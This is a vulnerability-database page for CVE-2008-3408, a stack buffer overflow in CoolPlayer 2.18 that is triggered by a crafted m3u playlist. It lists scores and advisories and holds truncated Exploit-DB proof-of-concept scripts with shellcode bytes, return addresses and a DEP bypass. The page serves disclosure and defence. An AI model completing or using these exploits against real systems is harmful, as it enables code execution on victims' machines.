CVE-2008-3408
published 2008-07-31CVE-2008-3408: Stack-based buffer overflow in CoolPlayer 2.18, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a crafted m3u…
PriorityP431medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
9.66%
94.9th percentile
Stack-based buffer overflow in CoolPlayer 2.18, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a crafted m3u file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ww8m-pmxw-w5x5: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
ghsa_unreviewed·2022-05-02·CVSS 6.8
CVE-2009-1437 [MEDIUM] CWE-119 GHSA-ww8m-pmxw-w5x5: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.
GHSA
GHSA-jhp7-q6m3-qh58: Stack-based buffer overflow in CoolPlayer 2
ghsa_unreviewed·2022-05-01
CVE-2008-3408 [MEDIUM] CWE-119 GHSA-jhp7-q6m3-qh58: Stack-based buffer overflow in CoolPlayer 2
Stack-based buffer overflow in CoolPlayer 2.18, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via a crafted m3u file.
No detection rules found.
Exploit-DB
CoolPlayer 2.18 - DEP Bypass
exploitdb·2011-01-02
CVE-2008-3408 CoolPlayer 2.18 - DEP Bypass
CoolPlayer 2.18 - DEP Bypass
---
# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines
print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"
# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\
Exploit-DB
CoolPlayer 2.18 - M3U Playlist Buffer Overflow
exploitdb·2009-12-22
CVE-2008-3408 CoolPlayer 2.18 - M3U Playlist Buffer Overflow
CoolPlayer 2.18 - M3U Playlist Buffer Overflow
---
#!/usr/bin/perl
# Versions affected: 2.18
# Tested on: Windows XP Pro SP2
# Author: data$hack
# Usage: expl.pl
my $file= "exs3.m3u";
my $junk= "A" x 223;
my $eip = pack('V',0x7C836940); #jmp esp from kernel
my $shellcode = "\x90" x 10;
$shellcode = $shellcode . "\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\xdf\xd9\x74\x24" .
"\xf4\x5b\x31\x43\x0e\x03\x43\x0e\x83\x49\x1c\x06\xb1\x71" .
"\x35\x4e\x3a\x89\xc6\x31\xb2\x6c\xf7\x63\xa0\xe5\xaa\xb3" .
"\xa2\xab\x46\x3f\xe6\x5f\xdc\x4d\x2f\x50\x55\xfb\x09\x5f" .
"\x66\xcd\x95\x33\xa4\x4f\x6a\x49\xf9\xaf\x53\x82\x0c\xb1" .
"\x94\xfe\xff\xe3\x4d\x75\xad\x13\xf9\xcb\x6e\x15\x2d\x40" .
"\xce\x6d\x48\x96\xbb\xc7\x53\xc6\x14\x53\x1b\xfe\x1f\x3b" .
"\xbc\xff\xcc\x5f\x80\xb6\x79\xab\x72\x49\xa8\xe5\x7b
Exploit-DB
CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow
exploitdb·2008-07-29
CVE-2008-3408 CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow
CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow
---
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd
No writeups or analysis indexed.
http://secunia.com/advisories/31294http://securityreason.com/securityalert/4088http://www.exploit-db.com/exploits/15895http://www.securityfocus.com/bid/30418http://www.vupen.com/english/advisories/2008/2264/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/44103https://www.exploit-db.com/exploits/6157http://secunia.com/advisories/31294http://securityreason.com/securityalert/4088http://www.exploit-db.com/exploits/15895http://www.securityfocus.com/bid/30418http://www.vupen.com/english/advisories/2008/2264/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/44103https://www.exploit-db.com/exploits/6157
2008-07-31
Published